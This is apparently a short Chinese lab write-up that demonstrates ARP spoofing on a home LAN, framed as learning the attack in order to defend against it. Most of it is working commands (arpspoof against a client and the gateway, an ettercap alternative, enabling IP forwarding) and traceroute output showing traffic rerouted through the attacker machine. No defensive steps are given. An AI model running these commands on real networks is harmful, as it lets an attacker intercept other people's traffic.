有攻才有防,本次测试下ARP欺骗攻击,对防止ARP攻击有更好的了解,请勿用于非法用途。
测试网络环境如下:
路由网关IP:192.168.1.1 MAC:00:1F:A3:65:55:8D
客户机A IP:192.168.1.3 MAC:00:0c:29:e7:cc:3b
客户机B IP:192.168.1.5 MAC: 00:0c:29:c6:f8:da
客户机B用作ARP攻击欺骗,发起ARP包欺骗客户机A网关MAC为客户机B网卡MAC:
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:c:29:e7:cc:3b 0806 42: arp reply 192.168.1.1 is-at 0:c:29:c6:f8:da
客户机B欺骗网关客户机A MAC地址为客户机B MAC:
arpspoof -i eth0 -t 192.168.1.1 192.168.1.3
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da
0:c:29:c6:f8:da 0:1f:a3:65:55:8d 0806 42: arp reply 192.168.1.3 is-at 0:c:29:c6:f8:da
或:
ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.3/
客户机B开启数据包转发功能:
echo 1 > /proc/sys/net/ipv4/ip_forward
网关tracert客户机A:
traceroute 192.168.1.3
traceroute to 192.168.1.3 (192.168.1.3), 30 hops max, 38 byte packets
1 192.168.1.5 (192.168.1.5) 1.307 ms 1.750 ms 1.241 ms
2 192.168.1.3 (192.168.1.3) 2.358 ms !C 7.161 ms !C 1.876 ms !C
客户机A tracert网关:
tracert 192.168.1.1
traceroute to 192.168.1.1 (192.168.1.1), 30 hops max, 40 byte packets
1 192.168.1.5 (192.168.1.5) 2.111 ms 1.962 ms 1.903 ms
2 192.168.1.1 (192.168.1.1) 1.863 ms 1.753 ms 5.969 ms
看到了吧,真是吭爹呀,都走客户机B代理了。。。。